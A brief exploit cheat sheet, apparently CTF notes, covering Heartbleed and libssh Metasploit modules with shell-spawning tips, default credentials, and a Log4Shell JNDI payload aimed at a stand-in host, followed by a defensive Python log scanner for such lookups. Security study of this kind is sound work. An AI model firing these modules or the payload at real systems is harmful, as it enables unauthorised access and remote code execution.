Common Exploits

  • Heartbleed

    Metasploit module: auxiliary/scanner/ssl/openssl_heartbleed

    Be sure to run set VERBOSE true to see the retrieved results. These often contain a flag or other valuable information.

  • libssh - SSH

    libssh 0.8.1 (or others??) is vulnerable to an authentication bypass that gives an easy and immediate login. Metasploit module: auxiliary/scanner/ssh/libssh_auth_bypass. Be sure to set spawn_pty true to actually receive a shell! Then use sessions -i 1 (or whatever ID is appropriate) to interact with the spawned shell.

  • Default credentials - CheatSheet

    Unconfigured systems may still accept their default credentials for login.

  • Log4Shell

    Exploit against the Java library Log4j. Malicious code is fetched from a remote JNDI server and executed. A payload looks like ${jndi:ldap://example.com:1389/a} and needs to be parsed by Log4j.
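
Because the Log4Shell string has to reach Log4j inside logged input, it also shows up in request logs. The following is an added example, not part of the original page: it scans log lines for the lookup form shown above, including percent-encoded and mixed-case copies, and extracts the callback scheme, host and port. The function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Matches the lookup form shown on the page: ${jndi:<scheme>://<host>[:port]/<path>}
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+://[^}\s]+)\}", re.IGNORECASE)

def decode_layers(text, max_rounds=3):
    """Percent-decode repeatedly so single- and double-encoded copies still match."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def find_jndi_lookups(line):
    """Return (scheme, host, port) for each JNDI lookup string found in a log line."""
    hits = []
    for match in JNDI_RE.finditer(decode_layers(line)):
        url = urlsplit(match.group(1))
        try:
            port = url.port
        except ValueError:  # non-numeric or out-of-range port in the logged string
            port = None
        hits.append((url.scheme.lower(), url.hostname, port))
    return hits

def scan(lines):
    """Map 1-based line number -> lookups found; clean lines are omitted."""
    report = {}
    for number, line in enumerate(lines, start=1):
        hits = find_jndi_lookups(line)
        if hits:
            report[number] = hits
    return report

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.com:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:03 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.com%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG).items():
        print(number, hits)
```

The extracted host and port are what to look for in outbound connection logs from the same server. The pattern only covers the literal form shown on this page, so it is a triage aid and not a complete detection rule.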